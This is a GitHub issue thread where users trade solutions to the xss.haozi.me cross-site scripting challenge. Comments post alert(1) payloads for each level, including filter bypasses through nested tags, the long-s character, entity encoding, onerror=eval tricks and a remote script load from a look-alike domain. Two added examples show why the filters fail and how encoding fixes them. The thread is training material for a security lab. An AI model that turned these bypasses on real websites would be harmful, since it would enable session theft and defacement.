Answers (one per comment; background information welcome) #1

Open
haozi opened this issue Mar 19, 2017 · 46 comments
Comments

@haozi
Owner

haozi commented Mar 19, 2017

0x00

<script>alert(1)</script>
@vczhan

vczhan commented Mar 19, 2017

0x01

</textarea><script>alert(1)</script>

@liutao

liutao commented Mar 19, 2017

0x02

"><svg/onload=alert(1)>

@jiangtao

jiangtao commented Mar 19, 2017

0x03

<script>alert`1`</script>

I wrote up a summary; I'm getting on in years and forget things easily, so I'm recording it here.

haozi changed the title from "Answers" to "Answers (one per comment; background information welcome)" on Mar 19, 2017
@iMusic

iMusic commented Mar 19, 2017

0x04

Parentheses () and the backtick ` are filtered: input.replace(/[()`]/g, '')

<script>window.onerror=eval;throw'=alert\x281\x29'</script
<iframe srcdoc="<script>parent.alert&#40;1&#41;</script>"
<svg><script>alert&#40;1&#41</script

@zhuweiyou

zhuweiyou commented Mar 21, 2017

0x05

><script>alert(1)</script>

@zhuweiyou

0x06

type=image src onerror
=alert(1)

@zhuweiyou

0x07

<svg/onload=alert(1) 

Add a space or a newline at the end.

@pre1ude

pre1ude commented Mar 25, 2017

0x08

</style ><script>alert(1)</script>

</style > escapes the regex.

@pre1ude

pre1ude commented Mar 25, 2017

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

Construct an eval'd JS URL that matches the regex.

@pre1ude

pre1ude commented Mar 25, 2017

0x0B

<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

HTML tags and domain names are case-insensitive, but the path part is case-sensitive, so just have the evil server serve J.JS.

@pre1ude

pre1ude commented Mar 25, 2017

0x0C

<scscriptript src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>

This shows that filtering tags by regex-replacing them with an empty string is very unreliable.

@pre1ude

pre1ude commented Mar 25, 2017

0x0D

 
alert(1)
-->

Newlines are not filtered, so a line break gets past the single-line comment, but the code then does not run properly; here an HTML comment --> can be used to comment out the JS that follows so the code runs properly.

@pre1ude

pre1ude commented Mar 25, 2017

0x0E

<ſcript src="https://xss.haozi.me/j.js"></script>

This level has two problems to solve: 1. <s gets broken by the regex replacement. 2. Uppercased JS cannot run.
Solution: 1. ſ is the Old English way of writing s, and it uppercases to a normal S. 2. Load the JS via an external link.
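An added example, not code from this thread or from xss.haozi.me, that runs the 0x0C and 0x0E payloads posted above through two filters of the kind those levels describe and through plain HTML entity encoding; the filter and encoder functions are my own approximations, not the challenge's code, and the script runs under Node.

```javascript
// Added example (not from the thread or xss.haozi.me): two filters of the
// kind levels 0x0C and 0x0E use, run against the payloads posted above,
// next to plain HTML entity encoding. Filters are my approximations.

// 0x0C style: delete every "script" in a single pass.
function stripScriptFilter(input) {
  return input.replace(/script/gi, '');
}

// 0x0E style: break every "<s", then uppercase so "<script" can't survive.
// Without the /u flag, /<s/i does not match the long s (U+017F), yet
// String#toUpperCase maps U+017F to a plain "S".
function uppercaseFilter(input) {
  return input.replace(/<s/gi, '<_').toUpperCase();
}

// Hardened alternative: encode every character with meaning in HTML text
// and attribute contexts, so user data can never open a tag at all.
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return input.replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Does a script tag survive the filter? Case-insensitive, like the parser.
function scriptTagSurvives(filter, payload) {
  return /<script\b/i.test(filter(payload));
}

// Payloads copied verbatim from the 0x0C and 0x0E comments.
const PAYLOAD_0X0C =
  '<scscriptript src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>';
const PAYLOAD_0X0E = '<\u017Fcript src="https://xss.haozi.me/j.js"></script>';

// Summary of what survives each filter.
function report() {
  return {
    strip_0x0C: scriptTagSurvives(stripScriptFilter, PAYLOAD_0X0C), // true
    upper_0x0E: scriptTagSurvives(uppercaseFilter, PAYLOAD_0X0E),   // true
    encode_0x0C: scriptTagSurvives(encodeForHtml, PAYLOAD_0X0C),    // false
    encode_0x0E: scriptTagSurvives(encodeForHtml, PAYLOAD_0X0E),    // false
  };
}

console.log(report());
```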

@pre1ude

pre1ude commented Mar 25, 2017

0x0F

');alert('1

Escaping inline JS inside HTML is wasted effort: the browser parses the HTML first and only then parses the JS.
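An added example, not code from this thread or from xss.haozi.me, that shows the 0x0F point in Node: a handler whose quotes were only HTML-encoded is undone by attribute decoding, while a value encoded for the JS context first and then for the attribute context stays a single string literal. The level's filter and the attribute decoder below are my own approximations, not the challenge's code.

```javascript
// Added example (not from the thread or xss.haozi.me): the 0x0F point.
// The level HTML-encodes quotes before placing input in an inline handler,
// but the HTML parser decodes attribute values before the JS engine sees
// them. The filter and the decoder below are my approximations.

// What the level does (approximation): HTML-encode quotes only.
function htmlEncodeQuotes(input) {
  return input.replace(/'/g, '&#39;').replace(/"/g, '&quot;');
}

// Full HTML encoding for an attribute value, used by the hardened version.
function htmlEncodeAttr(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// What the HTML parser does to an attribute value before handing it to the
// JS engine: decode character references in a single pass.
function decodeAttributeValue(value) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"' };
  return value.replace(/&(?:#(\d+)|(amp|lt|gt|quot));/g,
    (_, num, name) => (num ? String.fromCharCode(Number(num)) : named[name]));
}

// JS source the engine compiles for a handler like onclick="console.log('...')".
function vulnerableHandlerSource(userInput) {
  return decodeAttributeValue(`console.log('${htmlEncodeQuotes(userInput)}')`);
}

// Hardened: encode for the JS context first (JSON.stringify yields a string
// literal with quotes and backslashes escaped), then for the attribute
// context. After decoding, the engine sees exactly one string literal.
function hardenedHandlerSource(userInput) {
  return decodeAttributeValue(`console.log(${htmlEncodeAttr(JSON.stringify(userInput))})`);
}

// Run a handler with stubbed alert/console to observe what actually executes.
function runHandler(source) {
  const calls = { alert: [], log: [] };
  new Function('alert', 'console', source)(
    (v) => calls.alert.push(v), { log: (v) => calls.log.push(v) });
  return calls;
}

const PAYLOAD_0X0F = "');alert('1";   // payload from the 0x0F comment

console.log(runHandler(vulnerableHandlerSource(PAYLOAD_0X0F))); // alert fires
console.log(runHandler(hardenedHandlerSource(PAYLOAD_0X0F)));   // only log
```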

@pre1ude

pre1ude commented Mar 25, 2017

0x10

'';alert(1)

@pre1ude

pre1ude commented Mar 25, 2017

0x11

"),alert("1

@pre1ude

pre1ude commented Mar 25, 2017

0x12

\");alert(1)//

The " is escaped to \", and after HTML parsing the inside becomes console.log("\"), which throws a syntax error; adding one more \ fixes it.

@ArtemisZ

0x12

</script>
<script>
alert`1`;
</script>
<script>

Just open a new script tag containing alert`1`;

@liutao

liutao commented Apr 20, 2017

0x05

--!><script>alert(1)</script>

@lifangzheng

0x06

onmouseover
=alert(1)

@mntn0x

mntn0x commented Jun 7, 2018

0x0A
https://www.segmentfault.com/n/
1330000015188600/raw
Just register an account on the given site https://www.segmentfault.com, create a new note whose content is alert(1), then use that note's link; remember the line break.

@secxm

secxm commented Sep 6, 2018

0x07

<input type=button onclick="alert(1)"  (click the button)
<img src=javascript: onmouseover="alert(1)"  (click the image)

CYJNM mentioned this issue Nov 26, 2019
@mdly

mdly commented Dec 11, 2019

0x08

</style
><script>alert(1)</script>

@chengyizhou147

0x02

"><svg/onload=alert(1)>

"onmouseover="alert(document.domain)

@Kai5174

Kai5174 commented Feb 7, 2020

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

Construct an eval'd JS URL that matches the regex.

0x09

https://www.segmentfault.com/" onload=alert(1)>//

@treadpit

0x02

"><svg/onload=alert(1)>

"onmouseover="alert(document.domain)

"><script>alert(1)</script>

@c41vin

c41vin commented Aug 17, 2020

0x07

<img src onerror=alert(1)//

@mtcz91

mtcz91 commented Oct 4, 2020

<script>window.onerror=eval;throw'=alert\x281\x29'</script

Hi, does this work because the = causes an error, which pops the alert?

@TiffanyHYY

0x09

https://www.segmentfault.com
  "></script>
  <script>
    alert(1) </script>

@bin-name

bin-name commented Jan 3, 2021

0x09 and 0x0A

https://www.segmentfault.com.haozi.me/j.js

One addition: you must use Firefox; for some reason it doesn't work in the Google (Chromium) engine.

@abab46abab

abab46abab commented Jan 9, 2021

0x09

http://www.segmentfault.com"></script><script>alert(1);//

@suix6

suix6 commented Mar 23, 2021

0x04

@BypassNO

0x05

--!><script>alert(1)</script>

@highwayMo

highwayMo commented Jul 29, 2021

0x12

</script> 
<script>alert(1)</script>

@highwayMo

highwayMo commented Jul 29, 2021

0x0E

<ſcript src="https://xss.haozi.me/j.js"></script>

This level has two problems to solve: 1. <s gets broken by the regex replacement. 2. Uppercased JS cannot run.
Solution: 1. ſ is the Old English way of writing s, and it uppercases to a normal S. 2. Load the JS via an external link.

This answer no longer works for me in either Firefox or Google Chrome, because once the URL is uppercased J.JS cannot find j.js, so my approach is to use URL encoding to bypass the regex filter.

<ſcript src="https://xss.haozi.me/%6A%2E%6A%73"></script>

@N0I0C0K

N0I0C0K commented Sep 11, 2021

0x9

Write any nonexistent script, then an onerror event; this works in the Google engine too.

https://www.segmentfault.com/a.js" onerror="alert(1)

@upgiveup

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

Construct an eval'd JS URL that matches the regex.

Is there a correct answer for 0x0A now?

@haozi
Owner Author

haozi commented Oct 18, 2021

0x09 || 0x0A

https://www.segmentfault.com.haozi.me/j.js

Construct an eval'd JS URL that matches the regex.

Is there a correct answer for 0x0A now?

It's the idea that matters; just deploy your own domain. This domain is down now.

@jack-She1l

0x0B

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

ffffff0x mentioned this issue Mar 7, 2022
@quan9i

quan9i commented Jul 9, 2022

0x03

<a href=javascript:&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41>123</a>

@quan9i

quan9i commented Jul 9, 2022

0x06

onclick
=alert(1)

@quan9i

quan9i commented Jul 9, 2022

0x09

https://www.segmentfault.com"></script><img src="" onerror=alert(1)>
https://www.segmentfault.com"></script><script>alert(1)</script>

@quan9i

quan9i commented Jul 10, 2022

0x0A

https://www.segmentfault.com@xss.haozi.me/j.js
Works in Firefox.

@feigezai

0x09 ||0x0A

https://www.segmentfault.com.haozi.me/j.js
Don't give it a thumbs down; the external redirect takes about a minute.
A big thumbs up.

@tong-ge

tong-ge commented Jun 16, 2023

0x03||0x04

<iframe src="javascript:parent.alert%281%29">

@a3510377

0x10

'';alert(1)
alert(1)
